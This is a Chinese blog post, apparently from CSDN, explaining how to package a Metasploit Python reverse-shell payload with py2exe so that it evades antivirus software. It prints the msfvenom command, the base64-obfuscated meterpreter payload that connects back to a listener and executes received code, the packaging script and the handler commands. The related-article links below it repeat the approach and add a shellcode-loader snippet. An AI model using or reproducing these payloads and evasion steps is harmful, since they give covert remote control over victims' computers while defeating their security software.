python打包的exe如何免杀_如何使用Python进行Payload免杀

最新推荐文章于 2023-11-21 12:00:42 发布
最新推荐文章于 2023-11-21 12:00:42 发布
阅读量132 收藏
点赞数
文章标签: python打包的exe如何免杀

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msiPy2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payloadmsfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

evil.py 代码如下:import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:from distutils.core import setupimport py2exesetup(name = 'Meter',description = 'Python-based App',version = '1.0',console=['evil.py'],options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},zipfile = None,)

下面的方法运行 evil.py,生成可执行文件。python ./setup.py py2exe

0x03 设置监听端口

Kali 运行Metasploit,设置监听:msfconsoleuse exploit/multi/handlerset PAYLOAD python/meterpreter/reverse_tcpset LHOST 192.168.28.128set LPORT 443run

在Windows中运行evil.exe,获得一个meterpreter的会话:

weixin_39716160
关注
python打包exe如何免杀_使用Python进行防病毒免杀
weixin_39979167的博客
11-21 802
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装Python 2.7.16 x86:ht...
python打包exe如何免杀_Metasploit+python生成免杀exe过360杀毒
weixin_39771301的博客
11-26 746
Metasploit+python生成免杀exe过360杀毒1在kali下生成一个反弹的msf的python脚本,命令如下:msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py2.拷贝出bk.py到windo...
python制作免杀软件教程及工具.zip
07-26
本资源会教你如何用python制作免杀软件,并提供了所需的代码工具和脚本,亲测能够过360安全卫士和火绒。
Python免杀
weixin_43526443的博客
08-03 2382
Somethingu have to know: 本Python脚本构建简易的http请求及响应,可通过服务端调用客户端CMD执行命令(可在客户端内置便捷指令 )。 同时,脚本使用PyInstaller,将python解释器及第三方模块进行打包成可执行文件。 经测试可免杀绝大多数杀软。 0x01 环境准备 pip install requests(用于发送请求) pip install pyscreenshot...
python打包exe如何免杀_CS强化_python免杀
weixin_39947314的博客
11-26 713
CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。payload生成通过cs自动生成我们python payload:值得一提的是360、电脑管家等均为对该payload报毒,倒是Windows Defender觉得事情没那么简单,显然不装杀毒软件的PC是最难搞的23333,因为它会默认开启Window...
python打包exe如何免杀_使用Python进行防病毒免杀解析
weixin_39984952的博客
11-21 1300
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装2、msfvenom生成Python P...
python学习笔记——pythonexe免杀
小橙子的博客
07-07 969
思路: 将敏感代码转码,使用时解码再执行。 参考: https://blog.csdn.net/qq_32261191/article/details/108994177 一、敏感代码使用base64编码 #-*- coding: utf-8 -*- import base64 str = """ print('123') """ #编码 encode = base64.b64encode(str.encode('utf-8')) print(encode) 结果: b'CnByaW50
使用Python进行防病毒免杀解析
09-18
本文对使用Python进行免杀解析的技术进行了详细介绍,从环境准备到生成payload,再到打包和设置监听端口,以及最终的免杀验证,每一个步骤都涉及了精心设计的技术手段。需要强调的是,本文介绍的知识不应被用于非法...
python 生成payload_如何使用Python进行Payload免杀
weixin_36243867的博客
01-14 884
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装Python 2.7.16 x86:http...
python打包exe如何免杀_通过Python实现Payload分离免杀过程详解
weixin_39741101的博客
11-26 262
缺点:编译exe以后体积过大实现:msf生成shellcode代码:将payload给copy下来,去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33\x49\x6f\x44\x37\x64\x4b...
python免杀
weixin_43152809的博客
07-13 730
最近学习的过程中,发现python的匿名函数很适合用于免杀python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
Python写黑客小工具,360免杀
weixin_34235135的博客
12-31 579
构思: client:反向连接server,执行shell命令 server:发送命令,控制客户端 import subprocess import socket import threading target="172.22.40.41" port=55555 buffer="" def sendMag(c_socket): gl...
Python免杀技术详解
weixin_68789096的博客
11-02 1786
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
Python免杀入门学习
Fighter安全
04-23 2105
这里主要针对国内主流三大杀软进行免杀测试,python语法简单,开发效率高,适合入门学习,而且免杀效果也还不错。当然免杀是具有时效性的,文章的方法主要记录一下免杀思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11杀毒软件:360杀毒(全引擎) + 火绒 + Windows Defender。
基于python的简单免杀
2301_76232299的博客
11-21 1956
本次文章只用于技术讨论,学习,切勿用于非法用途。
Python shellcode免杀
qq_25761407的博客
04-02 5616
Python shellcode免杀
学习python免杀知识
gou1791241251的博客
01-06 202
#字符串转十六进制 python3.7 import codecs codecs.encode(“shellcode”) 案例: import ctypes import sys import random decode = sys.argv[1].decode(“hex”) n=random.randint(0,len(decode)-1) shellcode = bytearray(decode[:n]+decode[n:]) ptr = ctypes.windll.kernel32.VirtualAl
Pyinstaller生成exe文件免杀
xiaoxianerqq的专栏
02-04 1541
0x01 解决方案 之前用python打包exe文件总会被电脑关键识别成木马文件隔离,很困扰 (虽说本来也不是做什么好事= =) 解决方案: 再生成exe文件时给生成的exe加上图标即可。 使用命令: pyinstaller -i xxxx.ico -w -F xxxx.py 0x02 ico文件生成代码 pyinstaller需要特定的后缀为.ico的图片文件来生成图标, 且对文件的大小尺寸有要求。经过查询,以下方法可以顺利生成各种大小的图标 首先安装PIL库 #fo...
python免杀学习
m0_58595840的博客
01-06 460
python免杀bypass学习
Python反序列化免杀执行代码
最新发布
12-07
为了Python反序列化免杀执行代码,可以使用以下步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值